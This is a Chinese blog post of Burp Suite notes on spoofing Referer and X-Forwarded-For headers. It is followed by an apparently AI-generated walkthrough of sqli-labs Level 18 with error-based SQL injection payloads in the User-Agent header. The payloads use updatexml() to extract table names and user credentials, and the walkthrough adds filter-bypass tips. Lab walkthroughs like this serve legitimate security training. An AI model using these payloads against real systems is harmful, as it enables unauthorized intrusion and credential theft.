burpsuit学习--修改来源地址

本文介绍如何使用Burpsuit安装与配置Java环境,设置代理以监视网络流量,通过代理发送请求并修改请求头信息,实现对特定网站来源的请求模拟与上传文件的16进制修改。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

安装Burpsuit:

安装JAVA  环境   JDK

命令: Java –jar burpsuite_v1.4.jar   创建批处理 运行就行了

proxy -> options  设置代理     --------------     IE  上设置代理   -》连接-》局域网


这里就可以监视了


Proxy  ->  History  ->  看到有一条拦截

右击  -》  send to repeater   送到服务器

修改来源      -》GO

Accept: */*
Referer:http://xdsec.org          就可以来自  这个网站的来源去访问了
Accept-Language: zh-cn   


在这里还可以同样方法去去修改      上传文件




16进制修改······································································


修改 转到地址      A -》 目的

设置A地址

HTTP-X-Forwarded-For:212.77.1.243


设置转发 地址  为   HOSTS 修改


<think>嗯,用户想用Burp Suite攻破sqli-lab的第18关。首先,我需要回忆一下sqli-lab各个关卡的特点。第18关可能涉及到POST请求的注入,或者是需要处理HTTP头部的注入,比如User-Agent、Referer或Cookie之类的。因为在之前的关卡中,用户可能已经遇到过基于GET和POST的注入,而更高级的关卡可能会引入更复杂的场景。 用户提到的是第18关,根据我的记忆,sqli-lab的第18关是一个基于User-Agent的注入,并且可能需要通过报错注入来获取信息。这时候,常规的联合查询注入可能不可行,因为页面没有明显的回显位置。因此,需要利用报错注入技术,比如使用updatexml()或extractvalue()函数来触发错误信息,从而泄露数据。 接下来,使用Burp Suite的步骤大致如下:首先拦截登录请求,因为很多关卡需要先登录。然后,在请求中寻找可能的注入点,比如User-Agent头部。修改User-Agent的值,插入恶意SQL代码,观察服务器的响应是否有报错信息。如果报错信息中包含数据库内容,说明注入成功。 需要注意的点包括正确构造报错注入的payload,例如使用updatexml()函数时,需要确保XPath格式正确,并且通过concat函数将查询结果插入到报错信息中。同时,可能需要处理字符串长度限制的问题,使用substring或limit来分批次提取数据。 此外,用户可能需要了解如何配置Burp Suite的代理,设置浏览器通过Burp发送请求,以便拦截和修改HTTP流量。还有,处理可能存在的WAF或过滤机制,比如某些特殊字符被转义或过滤,这时候需要尝试绕过方法,比如使用双重编码或注释符。 另外,参考用户提供的引用内容,提到了无回显时的报错或盲注。所以在第18关中,如果确实没有回显,可能需要确认是否属于报错注入场景,或者是否需要结合时间盲注。但根据常见的攻略,第18关通常是报错注入,所以重点放在报错技术上。 最后,确保步骤详细,用户能够一步步跟随操作,包括如何修改请求、如何构造payload、如何解析返回的错误信息以提取数据。同时,提醒用户注意合法性和授权测试,避免进行未经许可的渗透测试。</think>### 使用Burp Suite攻破sqli-lab Level 18的步骤与技巧 #### 1. 环境准备与请求分析 - **配置Burp Suite代理**:设置浏览器通过Burp Suite发送请求(默认端口`8080`),确保能拦截HTTP流量 - **观察页面特性**:Level 18为HTTP头注入场景,注入点位于`User-Agent`头部[^1]。通过提交表单后触发后端SQL操作 #### 2. 注入点验证 ```http POST /sqli-labs/Less-18/ HTTP/1.1 User-Agent: ' or updatexml(1,concat(0x7e,version()),0) or ' ``` 若返回包含`XPATH syntax error`的报错信息,则确认存在报错注入漏洞,示例错误提示: $${\rm ERROR: ~5.7.26-0ubuntu0.18.04.1}$$ #### 3. 分步数据提取 **(1) 获取数据库名** ```http User-Agent: ' or updatexml(1,concat(0x7e,database()),0) or ' ``` 报错返回: $${\rm ERROR: ~security}$$ **(2) 获取表名** ```http User-Agent: ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) or ' ``` 通过修改`limit`参数遍历所有表(需处理报错信息长度限制) **(3) 提取字段值** ```http User-Agent: ' or updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1)),0) or ' ``` 返回错误信息将包含类似: $${\rm ERROR: ~Dumb:I-kill-you}$$ #### 4. 绕过限制技巧 - **字符串截断**:使用`substr()`分段获取长数据 ```http User-Agent: ' or updatexml(1,concat(0x7e,substr((select password from users limit 0,1),1,10)),0) or ' ``` - **HEX编码绕过**:对特殊字符进行编码处理 - **注释符使用**:`--+`或`#`消除语句尾部干扰 #### 5. 自动化辅助 使用Burp Suite的**Intruder**模块: 1. 标记注入位置为`§payload§` 2. 加载包含报错注入语句的字典 3. 通过错误响应筛选有效结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值